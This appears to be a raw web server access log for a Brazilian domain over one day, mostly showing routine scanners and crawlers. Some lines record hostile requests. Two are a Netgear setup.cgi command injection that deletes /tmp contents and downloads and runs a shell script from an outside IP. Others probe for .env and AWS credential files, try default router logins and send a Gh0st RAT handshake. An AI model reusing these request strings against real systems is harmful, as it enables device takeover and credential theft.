154.81.156.54 - - [29/Apr/2025:06:36:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
104.234.115.85 - - [29/Apr/2025:06:37:31 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
104.234.115.85 - - [29/Apr/2025:06:37:38 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
80.82.77.202 - - [29/Apr/2025:06:44:22 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:07:19:36 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
103.203.56.3 - - [29/Apr/2025:07:25:21 -0300] "GET / HTTP/1.1" 200 488 "-" "HTTP Banner Detection (https://security.ipip.net)"
vacivitta.com.br:80
154.81.156.7 - - [29/Apr/2025:07:28:38 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:07:52:10 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.84.178 - - [29/Apr/2025:07:53:18 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:08:21:49 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
176.65.148.10 - - [29/Apr/2025:08:30:12 -0300] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd+/tmp;rm+-rf+*;wget+http://94.26.90.205/netgear.sh;chmod+777+netgear.sh;sh+netgear.sh;&curpath=/¤tsetting.htm=1; HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
185.218.86.4 - - [29/Apr/2025:08:34:45 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
121.143.189.240 - - [29/Apr/2025:08:40:16 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.35 - - [29/Apr/2025:08:50:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:08:55:11 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
35.203.211.76 - - [29/Apr/2025:08:57:53 -0300] "GET / HTTP/1.1" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:09:46:21 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
43.128.156.124 - - [29/Apr/2025:10:02:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
118.33.170.108 - - [29/Apr/2025:10:12:50 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:10:17:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:10:45:16 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [29/Apr/2025:11:02:58 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
vacivitta.com.br:80
185.242.226.154 - - [29/Apr/2025:11:03:49 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "-" "Python/3.7 aiohttp/3.8.1"
vacivitta.com.br:80
154.81.156.35 - - [29/Apr/2025:11:19:32 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
4.182.24.127 - - [29/Apr/2025:11:20:47 -0300] "HEAD / HTTP/1.1" 200 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:11:21:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
176.65.148.10 - - [29/Apr/2025:11:24:56 -0300] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd+/tmp;rm+-rf+*;wget+http://94.26.90.205/netgear.sh;chmod+777+netgear.sh;sh+netgear.sh;&curpath=/¤tsetting.htm=1; HTTP/1.1" 404 - "-" "Go-http-client/1.1"
vacivitta.com.br:80
185.218.86.4 - - [29/Apr/2025:11:28:32 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.189.182.234 - - [29/Apr/2025:11:34:07 -0300] "GET / HTTP/1.1" 404 - "-" "-"
vacivitta.com.br:80
185.218.84.178 - - [29/Apr/2025:11:47:27 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
198.235.24.200 - - [29/Apr/2025:11:51:25 -0300] "GET / HTTP/1.1" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:11:52:14 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
190.98.45.63 - - [29/Apr/2025:12:03:34 -0300] "GET / HTTP/1.1" 200 488 "-" "Hello-World/1.0"
vacivitta.com.br:80
144.217.105.192 - - [29/Apr/2025:12:13:58 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
144.217.105.192 - - [29/Apr/2025:12:13:58 -0300] "POST / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:43 -0300] "GET /phpinfo HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:43 -0300] "GET /phpinfo.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:44 -0300] "GET /test.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:46 -0300] "GET /_profiler/phpinfo HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:46 -0300] "GET /info.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:48 -0300] "GET /php.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:48 -0300] "GET /php_info.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:50 -0300] "GET /i.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:50 -0300] "GET /pi.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:50 -0300] "GET /config.phpinfo HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:50 -0300] "GET /admin/phpinfo.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:52 -0300] "GET /.aws/credentials HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:55 -0300] "GET /pinfo.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:55 -0300] "GET /phpinfo2.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:56 -0300] "GET /php_version.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:56 -0300] "GET /version.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
87.251.78.46 - - [29/Apr/2025:12:25:58 -0300] "GET /server-info.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:12:26:40 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:13:18:19 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
43.130.3.120 - - [29/Apr/2025:13:31:01 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
vacivitta.com.br:80
66.240.205.34 - - [29/Apr/2025:13:34:12 -0300] "Gh0st\xad" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:13:37:53 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
122.97.138.70 - - [29/Apr/2025:13:49:35 -0300] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.35 - - [29/Apr/2025:13:52:03 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
104.234.115.139 - - [29/Apr/2025:14:10:41 -0300] "GET / HTTP/1.0" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
104.234.115.139 - - [29/Apr/2025:14:10:58 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
104.234.115.139 - - [29/Apr/2025:14:11:33 -0300] "GET / HTTP/1.1" 200 488 "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:14:13:13 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.242.226.154 - - [29/Apr/2025:14:21:52 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
104.234.115.139 - - [29/Apr/2025:14:35:27 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
104.234.115.139 - - [29/Apr/2025:14:35:39 -0300] "GET /favicon.ico HTTP/1.1" 404 - "-" "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:14:49:15 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
154.81.156.7 - - [29/Apr/2025:14:51:48 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
196.251.73.211 - - [29/Apr/2025:15:10:24 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
vacivitta.com.br:80
160.250.247.221 - - [29/Apr/2025:15:28:06 -0300] "POST /boaform/admin/formLogin HTTP/1.1" 404 - "http://162.240.168.168:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
vacivitta.com.br:80
185.44.10.190 - - [29/Apr/2025:15:31:57 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
vacivitta.com.br:80
13.89.125.24 - - [29/Apr/2025:15:32:37 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 zgrab/0.x"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:15:35:06 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
121.187.15.141 - - [29/Apr/2025:15:49:26 -0300] "GET / HTTP/1.0" 200 488 "-" "curl/7.88.1"
vacivitta.com.br:80
154.81.156.35 - - [29/Apr/2025:15:55:24 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
185.218.84.178 - - [29/Apr/2025:16:01:55 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
183.182.125.198 - - [29/Apr/2025:16:03:47 -0300] "POST /wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
vacivitta.com.br:80
183.182.125.198 - - [29/Apr/2025:16:03:48 -0300] "POST /wordpress/wp-login.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:16:04:01 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
148.113.206.49 - - [29/Apr/2025:16:13:00 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible; ModatScanner/1.0; +https://modat.io/)"
vacivitta.com.br:80
80.82.77.202 - - [29/Apr/2025:16:15:09 -0300] "\x16\x03\x02\x01o\x01" 404 - "-" "-"
vacivitta.com.br:80
154.81.156.7 - - [29/Apr/2025:16:23:58 -0300] "GET / HTTP/1.1" 200 488 "-" "-"
vacivitta.com.br:80
163.61.110.122 - - [29/Apr/2025:16:50:26 -0300] "POST /boaform/admin/formLogin HTTP/1.1" 404 - "http://162.240.168.168:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:16:53:46 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
128.199.7.255 - - [29/Apr/2025:17:13:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (compatible)"
vacivitta.com.br:80
128.199.7.255 - - [29/Apr/2025:17:13:08 -0300] "GET /ico.ico HTTP/1.1" 200 100526 "http://162.240.168.168/" "Mozilla/5.0 (compatible)"
vacivitta.com.br:80
154.81.156.54 - - [29/Apr/2025:17:20:55 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
vacivitta.com.br:80
198.235.24.194 - - [29/Apr/2025:17:23:13 -0300] "GET / HTTP/1.0" 200 488 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
vacivitta.com.br:80
45.156.128.127 - - [29/Apr/2025:17:37:08 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:52:54 -0300] "GET /.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060711 Firefox/1.5.0.4"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:52:54 -0300] "\x16\x03\x01" 404 - "-" "-"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:52:54 -0300] "GET / HTTP/1.1" 200 488 "-" "Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.0) Gecko/20060728 Firefox/1.5.0"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:52:55 -0300] "GET /.env.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30evme-launcher"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:52:56 -0300] "GET /.env.xml HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 (.NET CLR 3.5.30729)"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:52:56 -0300] "GET /env.xml HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/604.4.5 (KHTML, like Gecko) Version/11.0.2 Safari/604.4.5"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:52:56 -0300] "GET /.env.js HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.0.4) Gecko/20081029 Firefox/2.0.0.18"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:52:57 -0300] "GET /.env.list HTTP/1.1" 404 - "-" "Mozilla/5.0 (Mobile; LYF/F90M/LYF-F90M-000-02-28-130318; Android; rv:48.0) Gecko/48.0 Firefox/48.0 KAIOS/2.0"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:52:57 -0300] "GET /.env.html HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; ru) Opera 8.50"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:52:58 -0300] "GET /app/env/.env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 OPR/50.0.2762.67"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:52:58 -0300] "GET /user_secrets.yml HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.19"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:52:59 -0300] "GET /.__info.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.201.0 Safari/532.0"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:52:59 -0300] "GET /_env HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; U; Android 2.2.2; en-gb; HTC Desire 2.33.161.6 Build/FRG83G) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:00 -0300] "GET /.env.project HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:00 -0300] "GET /00_server_info.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:00 -0300] "GET /0_info.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050405 Firefox/1.0 (Ubuntu package 1.0.2)"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:01 -0300] "GET /0-info.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:01 -0300] "GET /0info.php HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; Linux) Opera 5.0 [en]"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:02 -0300] "GET /info_php.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; M660 Build/HuaweiM660) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:02 -0300] "GET /01-info.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.366.2 Safari/533.4"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:03 -0300] "GET /PhpInfo.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/600.3.10 (KHTML, like Gecko) Version/8.0.3 Safari/600.3.10"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:03 -0300] "GET /PHPInfo.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729)"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:03 -0300] "GET /1_1_PhpInfo.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.5.6"
vacivitta.com.br:80
78.153.140.151 - - [29/Apr/2025:17:53:04 -0300] "GET /5info.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 7.1.1; SM-J700T Build/NMF26X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36"
vacivitta.com.br:80
